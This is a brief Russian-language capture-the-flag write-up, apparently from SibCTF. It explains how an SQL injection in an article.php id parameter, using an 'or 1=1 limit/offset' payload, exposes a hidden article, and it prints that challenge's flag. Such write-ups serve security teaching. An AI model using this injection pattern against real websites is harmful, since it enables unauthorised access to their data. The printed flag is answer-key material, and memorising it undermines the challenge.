# СУКЕУЕЛЬИНЖАКТИОН

>>>
Это явно не все статьи тут, я помню одну с флагом
>>>

---
В детальном виде статьи, в строке в бразуере, можно было увидеть следующее
`http://sib.omctf.ru:7000/article.php?id=58`  
Предполагаем что тут можно использовать sql-инъекцию, и спустя какое то время подбираем следующее
`http://sib.omctf.ru:7000/article.php?id=-1' or 1=1 limit 1 offset 29 -- '`  
и таким образом получаем доступ к той самой статье, в которой лежал флаг

`sibctf{OMG_I_FINALLY_GOT_IT}`
